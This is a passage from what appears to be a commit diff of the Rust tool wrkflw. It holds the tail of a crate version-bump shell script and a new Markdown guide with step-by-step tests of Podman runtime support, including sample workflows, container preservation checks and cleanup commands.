    ls crates/ | grep -v README.md
    exit 1
fi

echo "Bumping $CRATE_NAME with $VERSION_TYPE..."

# Get current version from the crate's Cargo.toml
CURRENT_VERSION=$(grep "^version" "$CRATE_DIR/Cargo.toml" | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/' | sed 's/.*workspace *= *true.*//')

if [[ "$CURRENT_VERSION" == "" ]]; then
    # If using workspace version, get it from workspace Cargo.toml
    CURRENT_VERSION=$(grep "^version" Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')
    echo "Current workspace version: $CURRENT_VERSION"
else
    echo "Current crate version: $CURRENT_VERSION"
fi

# Calculate new version
if [[ "$VERSION_TYPE" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
    NEW_VERSION="$VERSION_TYPE"
else
    # Use semver logic for patch/minor/major
    IFS='.' read -ra VERSION_PARTS <<< "$CURRENT_VERSION"
    MAJOR="${VERSION_PARTS[0]}"
    MINOR="${VERSION_PARTS[1]}"
    PATCH="${VERSION_PARTS[2]}"

    case "$VERSION_TYPE" in
        "patch")
            NEW_VERSION="$MAJOR.$MINOR.$((PATCH + 1))"
            ;;
        "minor")
            NEW_VERSION="$MAJOR.$((MINOR + 1)).0"
            ;;
        "major")
            NEW_VERSION="$((MAJOR + 1)).0.0"
            ;;
        *)
            echo "Error: Invalid version type. Use patch|minor|major or specify exact version"
            exit 1
            ;;
    esac
fi

echo "New version: $NEW_VERSION"

# Update the crate's Cargo.toml to use explicit version instead of workspace
sed -i.bak "s/version\.workspace = true/version = \"$NEW_VERSION\"/" "$CRATE_DIR/Cargo.toml"

# Update the workspace Cargo.toml with the new version
if grep -q "$CRATE_NAME.*version.*=" Cargo.toml; then
    sed -i.bak "s/\($CRATE_NAME.*version = \"\)[^\"]*\"/\1$NEW_VERSION\"/" Cargo.toml
else
    echo "Warning: $CRATE_NAME not found in workspace dependencies"
fi

# Clean up backup files
rm -f "$CRATE_DIR/Cargo.toml.bak" Cargo.toml.bak

echo ""
echo "✅ Successfully bumped $CRATE_NAME to version $NEW_VERSION"
echo ""
echo "Next steps:"
echo "1. Review the changes: git diff"
echo "2. Test the build: cargo check"
echo "3. Commit the changes: git add . && git commit -m 'bump: $CRATE_NAME to $NEW_VERSION'"
echo "4. Create a tag: git tag v$NEW_VERSION-$CRATE_NAME"
echo "5. Push: git push origin main --tags"
echo ""
echo "To publish individual crate:"
echo "  cd $CRATE_DIR && cargo publish"
@@ -1,6 +1,6 @@
# Testing Strategy

This directory contains integration tests for the `wrkflw` project. We follow the Rust testing best practices by organizing tests as follows:
This directory contains all tests and test-related files for the `wrkflw` project. We follow the Rust testing best practices by organizing tests as follows:

## Test Organization

@@ -11,6 +11,17 @@ This directory contains integration tests for the `wrkflw` project. We follow th
- **End-to-End Tests**: Also located in this `tests/` directory
  - `cleanup_test.rs` - Tests for cleanup functionality with Docker resources

## Test Directory Structure

- **`fixtures/`**: Test data and configuration files
  - `gitlab-ci/` - GitLab CI configuration files for testing
- **`workflows/`**: GitHub Actions workflow files for testing
  - Various YAML files for testing workflow validation and execution
- **`scripts/`**: Test automation scripts
  - `test-podman-basic.sh` - Basic Podman integration test script
  - `test-preserve-containers.sh` - Container preservation testing script
- **`TESTING_PODMAN.md`**: Comprehensive Podman testing documentation

## Running Tests

To run all tests:

487
tests/TESTING_PODMAN.md
Normal file
@@ -0,0 +1,487 @@
# Testing Podman Support in WRKFLW
|
||||
|
||||
This document provides comprehensive testing steps to verify that Podman support is working correctly in wrkflw.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### 1. Install Podman
|
||||
|
||||
Choose the installation method for your operating system:
|
||||
|
||||
#### macOS (using Homebrew)
|
||||
```bash
|
||||
brew install podman
|
||||
```
|
||||
|
||||
#### Ubuntu/Debian
|
||||
```bash
|
||||
sudo apt-get update
|
||||
sudo apt-get install podman
|
||||
```
|
||||
|
||||
#### RHEL/CentOS/Fedora
|
||||
```bash
|
||||
# Fedora
|
||||
sudo dnf install podman
|
||||
|
||||
# RHEL/CentOS 8+
|
||||
sudo dnf install podman
|
||||
```
|
||||
|
||||
#### Windows
|
||||
```bash
|
||||
# Using Chocolatey
|
||||
choco install podman-desktop
|
||||
|
||||
# Or download from https://podman.io/getting-started/installation
|
||||
```
|
||||
|
||||
### 2. Initialize Podman (macOS/Windows only)
|
||||
```bash
|
||||
podman machine init
|
||||
podman machine start
|
||||
```
|
||||
|
||||
### 3. Verify Podman Installation
|
||||
```bash
|
||||
podman version
|
||||
podman info
|
||||
```
|
||||
|
||||
Expected output should show Podman version and system information without errors.
|
||||
|
||||
### 4. Build WRKFLW with Podman Support
|
||||
```bash
|
||||
cd /path/to/wrkflw
|
||||
cargo build --release
|
||||
```
|
||||
|
||||
## Test Plan
|
||||
|
||||
### Test 1: CLI Runtime Selection
|
||||
|
||||
#### 1.1 Test Default Runtime (Docker)
|
||||
```bash
|
||||
# Should default to Docker
|
||||
./target/release/wrkflw run --help | grep -A 5 "runtime"
|
||||
```
|
||||
Expected: Should show `--runtime` option with default value `docker`.
|
||||
|
||||
#### 1.2 Test Podman Runtime Selection
|
||||
```bash
|
||||
# Should accept podman as runtime
|
||||
./target/release/wrkflw run --runtime podman tests/workflows/example.yml
|
||||
```
|
||||
Expected: Should run without CLI argument errors.
|
||||
|
||||
#### 1.3 Test Emulation Runtime Selection
|
||||
```bash
|
||||
# Should accept emulation as runtime
|
||||
./target/release/wrkflw run --runtime emulation tests/workflows/example.yml
|
||||
```
|
||||
Expected: Should run without CLI argument errors.
|
||||
|
||||
#### 1.4 Test Invalid Runtime Selection
|
||||
```bash
|
||||
# Should reject invalid runtime
|
||||
./target/release/wrkflw run --runtime invalid tests/workflows/example.yml
|
||||
```
|
||||
Expected: Should show error about invalid runtime choice.
|
||||
|
||||
### Test 2: Podman Availability Detection
|
||||
|
||||
#### 2.1 Test with Podman Available
|
||||
```bash
|
||||
# Ensure Podman is running
|
||||
podman info > /dev/null && echo "Podman is available"
|
||||
|
||||
# Test wrkflw detection
|
||||
./target/release/wrkflw run --runtime podman --verbose test-workflows/example.yml
|
||||
```
|
||||
Expected: Should show "Podman is available, using Podman runtime" in logs.
|
||||
|
||||
#### 2.2 Test with Podman Unavailable
|
||||
```bash
|
||||
# Temporarily make podman unavailable
|
||||
sudo mv /usr/local/bin/podman /usr/local/bin/podman.bak 2>/dev/null || echo "Podman not in /usr/local/bin"
|
||||
|
||||
# Test fallback to emulation
|
||||
./target/release/wrkflw run --runtime podman --verbose test-workflows/example.yml
|
||||
|
||||
# Restore podman
|
||||
sudo mv /usr/local/bin/podman.bak /usr/local/bin/podman 2>/dev/null || echo "Nothing to restore"
|
||||
```
|
||||
Expected: Should show "Podman is not available. Using emulation mode instead."
|
||||
|
||||
### Test 3: Container Execution with Podman
|
||||
|
||||
#### 3.1 Create a Simple Test Workflow
|
||||
Create `test-podman-workflow.yml`:
|
||||
|
||||
```yaml
|
||||
name: Test Podman Workflow
|
||||
on: [workflow_dispatch]
|
||||
|
||||
jobs:
|
||||
test-podman:
|
||||
runs-on: ubuntu-latest
|
||||
container: ubuntu:20.04
|
||||
steps:
|
||||
- name: Test basic commands
|
||||
run: |
|
||||
echo "Testing Podman container execution"
|
||||
whoami
|
||||
pwd
|
||||
ls -la
|
||||
echo "Container test completed successfully"
|
||||
|
||||
- name: Test environment variables
|
||||
env:
|
||||
TEST_VAR: "podman-test"
|
||||
run: |
|
||||
echo "Testing environment variables"
|
||||
echo "TEST_VAR: $TEST_VAR"
|
||||
echo "GITHUB_WORKSPACE: $GITHUB_WORKSPACE"
|
||||
echo "RUNNER_OS: $RUNNER_OS"
|
||||
|
||||
- name: Test volume mounting
|
||||
run: |
|
||||
echo "Testing volume mounting"
|
||||
echo "test-file-content" > test-file.txt
|
||||
cat test-file.txt
|
||||
ls -la test-file.txt
|
||||
```
|
||||
|
||||
#### 3.2 Test Podman Container Execution
|
||||
```bash
|
||||
./target/release/wrkflw run --runtime podman --verbose test-podman-workflow.yml
|
||||
```
|
||||
Expected: Should execute all steps successfully using Podman containers.
|
||||
|
||||
#### 3.3 Compare with Docker Execution
|
||||
```bash
|
||||
# Test same workflow with Docker
|
||||
./target/release/wrkflw run --runtime docker --verbose test-podman-workflow.yml
|
||||
|
||||
# Test same workflow with emulation
|
||||
./target/release/wrkflw run --runtime emulation --verbose test-podman-workflow.yml
|
||||
```
|
||||
Expected: All three runtimes should produce similar results (emulation may have limitations).

### Test 4: TUI Interface Testing

#### 4.1 Test TUI Runtime Selection

```bash
./target/release/wrkflw tui tests/workflows/
```

**Test Steps:**
1. Launch TUI
2. Press `e` key to cycle through runtimes
3. Verify status bar shows: Docker → Podman → Emulation → Docker
4. Check that Podman status shows "Connected" or "Not Available"
5. Select a workflow and run it with Podman runtime

#### 4.2 Test TUI with Specific Runtime

```bash
# Start TUI with Podman runtime
./target/release/wrkflw tui --runtime podman test-workflows/

# Start TUI with emulation runtime
./target/release/wrkflw tui --runtime emulation test-workflows/
```

Expected: TUI should start with the specified runtime active.

### Test 5: Container Preservation Testing

✅ **Note**: Container preservation is fully supported with Podman and works correctly.

#### 5.1 Test Container Cleanup (Default)

```bash
# Run a workflow that will fail
echo 'name: Failing Test
on: [workflow_dispatch]
jobs:
  fail:
    runs-on: ubuntu-latest
    container: ubuntu:20.04
    steps:
      - run: exit 1' > test-fail-workflow.yml

./target/release/wrkflw run --runtime podman test-fail-workflow.yml

# Check if containers were cleaned up
podman ps -a --filter "name=wrkflw-"
```

Expected: No wrkflw containers should remain.
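
To make this check scriptable rather than visual, count the leftovers and assert zero:

```bash
# Fail loudly if any wrkflw- containers survived cleanup
LEFTOVER=$(podman ps -aq --filter "name=wrkflw-" | wc -l)
[ "$LEFTOVER" -eq 0 ] && echo "PASS: no leftover containers" || echo "FAIL: $LEFTOVER leftover container(s)"
```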

#### 5.2 Test Container Preservation on Failure

```bash
./target/release/wrkflw run --runtime podman --preserve-containers-on-failure test-fail-workflow.yml

# Check if failed container was preserved
podman ps -a --filter "name=wrkflw-"
```

Expected: Should show preserved container. Note the container ID for inspection.

#### 5.3 Test Container Inspection

```bash
# Get container ID from previous step
CONTAINER_ID=$(podman ps -a --filter "name=wrkflw-" --format "{{.ID}}" | head -1)

# Inspect the preserved container (if it has already stopped, `podman exec`
# will fail; try `podman start $CONTAINER_ID` first)
podman exec -it $CONTAINER_ID bash
# Inside container: explore the environment, check files, etc.
# Exit with: exit

# Clean up manually (-f also stops the container if it is still running)
podman rm -f $CONTAINER_ID
```
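
Whether or not the container can be entered, its final state and logs are available from the host; a quick post-mortem sketch:

```bash
# Post-mortem without entering the container
podman inspect $CONTAINER_ID --format '{{.State.Status}} (exit code {{.State.ExitCode}})'
podman logs $CONTAINER_ID | tail -20
```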

### Test 6: Image Operations Testing

#### 6.1 Test Image Pulling

```bash
# Create workflow that uses a specific image
echo 'name: Image Pull Test
on: [workflow_dispatch]
jobs:
  test:
    runs-on: ubuntu-latest
    container: node:18-alpine
    steps:
      - run: node --version' > test-image-pull.yml

./target/release/wrkflw run --runtime podman --verbose test-image-pull.yml
```

Expected: Should pull node:18-alpine image and execute successfully.
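
To be sure the pull path is actually exercised (and the image is not just served from cache), remove any local copy first and confirm it reappears afterwards:

```bash
# Clear the cached image, re-run, then confirm it is back in local storage
podman rmi node:18-alpine 2>/dev/null || true
./target/release/wrkflw run --runtime podman --verbose test-image-pull.yml
podman images --filter "reference=node:18-alpine"
```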

#### 6.2 Test Custom Image Building

```bash
# Create a workflow that builds a custom image (if supported)
# This tests the build_image functionality
mkdir -p test-build
echo 'FROM ubuntu:20.04
RUN apt-get update && apt-get install -y curl
CMD ["echo", "Custom image test"]' > test-build/Dockerfile

echo 'name: Image Build Test
on: [workflow_dispatch]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Build and test custom image
        run: |
          echo "Testing custom image scenarios"
          curl --version' > test-custom-image.yml

# Note: This test depends on language environment preparation
./target/release/wrkflw run --runtime podman --verbose test-custom-image.yml
```
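
To separate wrkflw-side problems from Podman-side ones, the Dockerfile can be built and run with Podman directly first (the `wrkflw-test-build` tag is just an illustrative name):

```bash
# Sanity-check the Dockerfile with Podman alone, independent of wrkflw
podman build -t wrkflw-test-build:latest test-build/
podman run --rm wrkflw-test-build:latest
```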

### Test 7: Error Handling and Edge Cases

#### 7.1 Test Invalid Container Image

```bash
echo 'name: Invalid Image Test
on: [workflow_dispatch]
jobs:
  test:
    runs-on: ubuntu-latest
    container: nonexistent-image:invalid-tag
    steps:
      - run: echo "This should fail"' > test-invalid-image.yml

./target/release/wrkflw run --runtime podman test-invalid-image.yml
```

Expected: Should handle image pull failure gracefully with clear error message.
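
Since error messages may differ between engines (see the limitations summary below), it can be useful to reproduce the failure with Podman directly and compare the wording:

```bash
# Reproduce the pull failure outside wrkflw to compare error messages
podman pull nonexistent-image:invalid-tag || echo "pull failed as expected"
```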

#### 7.2 Test Network Connectivity

```bash
echo 'name: Network Test
on: [workflow_dispatch]
jobs:
  test:
    runs-on: ubuntu-latest
    container: ubuntu:20.04
    steps:
      - name: Test network access
        run: |
          apt-get update
          apt-get install -y curl dnsutils
          curl -s https://httpbin.org/get
      - name: Test DNS resolution
        run: nslookup google.com' > test-network.yml

./target/release/wrkflw run --runtime podman --verbose test-network.yml
```

Expected: Should have network access and complete successfully. (`dnsutils` is installed in the first step because `nslookup` is not present in the stock ubuntu:20.04 image.)

#### 7.3 Test Resource Intensive Workflow

```bash
echo 'name: Resource Test
on: [workflow_dispatch]
jobs:
  test:
    runs-on: ubuntu-latest
    container: ubuntu:20.04
    steps:
      - name: Memory test
        run: |
          echo "Testing memory usage"
          free -h
          dd if=/dev/zero of=/tmp/test bs=1M count=100
          ls -lh /tmp/test
          rm /tmp/test
      - name: CPU test
        run: |
          echo "Testing CPU usage"
          yes > /dev/null &
          PID=$!
          sleep 2
          kill $PID
          echo "CPU test completed"' > test-resources.yml

./target/release/wrkflw run --runtime podman --verbose test-resources.yml
```
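
While the resource workflow runs, usage can also be watched from the host in a second terminal:

```bash
# One-shot snapshot of CPU and memory usage for running containers
podman stats --no-stream
```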

### Test 8: Comparison Testing

#### 8.1 Create Comprehensive Test Workflow

```bash
echo 'name: Comprehensive Runtime Comparison
on: [workflow_dispatch]

env:
  GLOBAL_VAR: "global-value"

jobs:
  test-all-features:
    runs-on: ubuntu-latest
    container: ubuntu:20.04
    env:
      JOB_VAR: "job-value"
    steps:
      - name: Environment test
        env:
          STEP_VAR: "step-value"
        run: |
          echo "=== Environment Variables ==="
          echo "GLOBAL_VAR: $GLOBAL_VAR"
          echo "JOB_VAR: $JOB_VAR"
          echo "STEP_VAR: $STEP_VAR"
          echo "GITHUB_WORKSPACE: $GITHUB_WORKSPACE"
          echo "GITHUB_REPOSITORY: $GITHUB_REPOSITORY"
          echo "RUNNER_OS: $RUNNER_OS"

      - name: File system test
        run: |
          echo "=== File System Test ==="
          pwd
          ls -la
          whoami
          id
          df -h

      - name: Network test
        run: |
          echo "=== Network Test ==="
          apt-get update -q
          apt-get install -y curl iputils-ping
          ping -c 3 8.8.8.8
          curl -s https://httpbin.org/ip

      - name: Process test
        run: |
          echo "=== Process Test ==="
          ps aux
          top -b -n 1 | head -10

      - name: Package installation test
        run: |
          echo "=== Package Test ==="
          apt-get install -y python3 python3-pip
          python3 --version
          pip3 --version' > comprehensive-test.yml
```

#### 8.2 Run Comprehensive Test with All Runtimes

```bash
echo "Testing with Docker:"
./target/release/wrkflw run --runtime docker --verbose comprehensive-test.yml > docker-test.log 2>&1
DOCKER_EXIT=$?

echo "Testing with Podman:"
./target/release/wrkflw run --runtime podman --verbose comprehensive-test.yml > podman-test.log 2>&1
PODMAN_EXIT=$?

echo "Testing with Emulation:"
./target/release/wrkflw run --runtime emulation --verbose comprehensive-test.yml > emulation-test.log 2>&1
EMULATION_EXIT=$?

# Compare results ($? only holds the most recent status, so each code is captured above)
echo "=== Comparing Results ==="
echo "Docker exit code: $DOCKER_EXIT"
echo "Podman exit code: $PODMAN_EXIT"
echo "Emulation exit code: $EMULATION_EXIT"

# Optional: Compare log outputs
diff docker-test.log podman-test.log | head -20
```
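
Raw logs rarely diff cleanly because of timestamps and generated container names. A hedged helper that strips the most volatile fields first (the `sed` patterns are illustrative and may need tuning for wrkflw's actual log format):

```bash
# Normalize logs before diffing so only behavioral differences remain
for rt in docker podman emulation; do
  sed -E -e 's/[0-9]{2}:[0-9]{2}:[0-9]{2}//g' \
         -e 's/wrkflw-[A-Za-z0-9-]+/wrkflw-<id>/g' \
         "$rt-test.log" > "$rt-test.norm"
done
diff docker-test.norm podman-test.norm | head -20
```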

## Expected Results Summary

### ✅ **Should Work:**
- CLI accepts `--runtime podman` without errors
- TUI cycles through Docker → Podman → Emulation with 'e' key
- Status bar shows Podman availability correctly
- Container execution works identically to Docker
- Container cleanup respects preservation settings
- Image pulling and basic image operations work
- Environment variables are passed correctly
- Volume mounting works for workspace access
- Network connectivity is available in containers
- Error handling is graceful and informative

### ⚠️ **Limitations to Expect:**
- Some advanced Docker-specific features may not work identically
- Performance characteristics may differ from Docker
- Podman-specific configuration might be needed for complex scenarios
- Error messages may differ between Docker and Podman

### 🚨 **Should Fail Gracefully:**
- Invalid runtime selection should show clear error
- Missing Podman should fall back to emulation with warning
- Invalid container images should show helpful error messages
- Network issues should be reported clearly

## Cleanup

After testing, clean up test files:

```bash
rm -f test-podman-workflow.yml test-fail-workflow.yml test-image-pull.yml
rm -f test-custom-image.yml test-invalid-image.yml test-network.yml
rm -f test-resources.yml comprehensive-test.yml
rm -f docker-test.log podman-test.log emulation-test.log
rm -rf test-build/
podman system prune -f  # Clean up unused containers and images
```

## Troubleshooting

### Common Issues:

1. **"Podman not available"**
   - Verify Podman installation: `podman version`
   - Check Podman service: `podman machine list` (macOS/Windows)

2. **Permission errors**
   - Podman should work rootless by default
   - Check user namespaces: `podman unshare cat /proc/self/uid_map`

3. **Network issues**
   - Test basic connectivity: `podman run --rm ubuntu:20.04 ping -c 1 8.8.8.8`

4. **Container startup failures**
   - Check Podman logs: `podman logs <container-id>`
   - Verify image availability: `podman images`
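
These checks can be rolled into one quick sanity script to run before digging into wrkflw itself (a minimal sketch):

```bash
# Environment sanity check: installation, service, and basic container execution
podman version > /dev/null 2>&1 && echo "OK: podman installed" || echo "FAIL: podman missing"
podman info > /dev/null 2>&1 && echo "OK: podman service reachable" || echo "FAIL: podman service"
podman run --rm ubuntu:20.04 true && echo "OK: containers run" || echo "FAIL: container execution"
```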

This comprehensive testing plan should verify that Podman support is working correctly and help identify any issues that need to be addressed.